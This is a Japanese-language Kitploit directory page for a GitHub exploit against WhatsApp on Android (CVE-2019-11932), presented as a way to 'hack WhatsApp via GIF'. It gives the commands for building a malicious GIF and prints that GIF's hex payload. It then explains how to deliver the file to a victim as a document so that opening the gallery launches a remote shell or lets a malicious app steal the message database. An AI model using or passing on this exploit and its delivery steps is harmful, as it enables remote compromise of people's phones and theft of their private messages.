Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-11932 — Gif経由でWhatsappをハッキングするプログラム。ポートでエクスプロイトを作成します。 | Kitploit
ツール/GitHubGitHub/fastmo/cve-2019-11932
Androidセキュリティペイロード生成脆弱性分析エクスプロイトモバイルセキュリティリモートアクセスツールバイナリエクスプロイト
GitHubfastmo/cve-2019-11932

CVE-2019-11932

Gif経由でWhatsappをハッキングするプログラム。ポートでエクスプロイトを作成します。

リポジトリを見る
171196年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-11932

system()のアドレスとgadgetは、情報漏洩の脆弱性で見つかった実際のアドレスに置き換える必要があります。

system()のアドレスとgadgetを置き換えた後、以下のコードを実行して悪意のあるGIFファイルを生成します:

notroot@osboxes:~/Desktop/gif$ make
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit exploit.gif
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B

次に、exploit.gifファイルをコピーし、WhatsAppで別のWhatsAppユーザーにドキュメントとして送信します。メディアファイルとして送信しないでください。そうしないと、WhatsAppは送信前にMP4に変換しようとします。ユーザーが悪意のあるGIFファイルを受信しても、ユーザーがWhatsAppのギャラリーを開いて友達にメディアファイルを送信するまで何も起こりません。

#手順

WhatsApp GIF攻撃ベクター(ミニニュースと最後の手順)

                              -----ミニニュースと手順----

WhatsApp GIFハッキングは2つの方法で実行できます。

ローカル特権の段階(ユーザーアプリからWhatsAppへ): Androidデバイスに悪意のあるアプリがインストールされます。アプリはzygoteライブラリのアドレスを収集し、WhatsAppでのコード実行を引き起こす悪意のあるGIFファイルを作成します。これにより、マルウェアアプリはWhatsAppのサンドボックスからメッセージデータベースを含むファイルを盗むことができます。 リモートコード実行: リモートメモリ情報漏洩の脆弱性を持つアプリとの連携。攻撃者はzygoteライブラリのアドレスを収集し、悪意のあるGIFファイルを作成してWhatsApp経由でユーザーに送信できます(添付ファイルとして送信する必要があり、ギャラリー選択からの画像としては送信しないでください。WhatsAppはメディアファイルをMP4に変換しようとし、悪意のあるGIFが役に立たなくなるためです)。ユーザーがWhatsAppでギャラリービューを開くとすぐに、GIFファイルがWhatsAppのコンテキストでリモートシェルを起動します。 必読: かつて知らなかった4つのFitbitハック 最新のAndroid上のWhatsAppはハッキング可能です Android 8.1および9.0は悪用可能ですが、以前のバージョンはそうではありません。研究者によると、二重解放バグは以前のOSバージョンでも依然としてトリガーされる可能性があるが、RCEを実行するための悪意のあるコードが実行される前にクラッシュが発生するとのことです。 WhatsAppをハッキングする悪意のあるGIF 結論: Facebookはセキュリティ問題を認識し、WhatsAppバージョン2.19.244で問題を修正しました。Facebookはこれを大した脆弱性ではないかのように装いましたが、実際にはかなり厄介なものです。いつものように、アプリケーションを最新の状態に保ち、不要なアプリをインストールしないでください。

--------------------------------------------------------手順---------------------------------------------------------------------------

このリポジトリのコードを単にコンパイルしてください。system()のアドレスとgadgetは、GIFがRCEを実行する前に、他の手法を使用して自分で発見する必要がある情報漏洩の脆弱性で見つかった実際のアドレスに置き換える必要があります。前のリンクに記載されたコードをコンパイルしたら、その内容をGIFファイルにコピーし、WhatsAppで別のWhatsAppユーザーにドキュメントとして送信します。メディアファイルとして送信しないでください。そうしないと、WhatsAppは送信前にMP4に変換しようとします。ユーザーが悪意のあるGIFファイルを受信しても、ユーザーがWhatsAppのギャラリーを開いて友達にメディアファイルを送信するまで何も起こりません。

ツールをダウンロード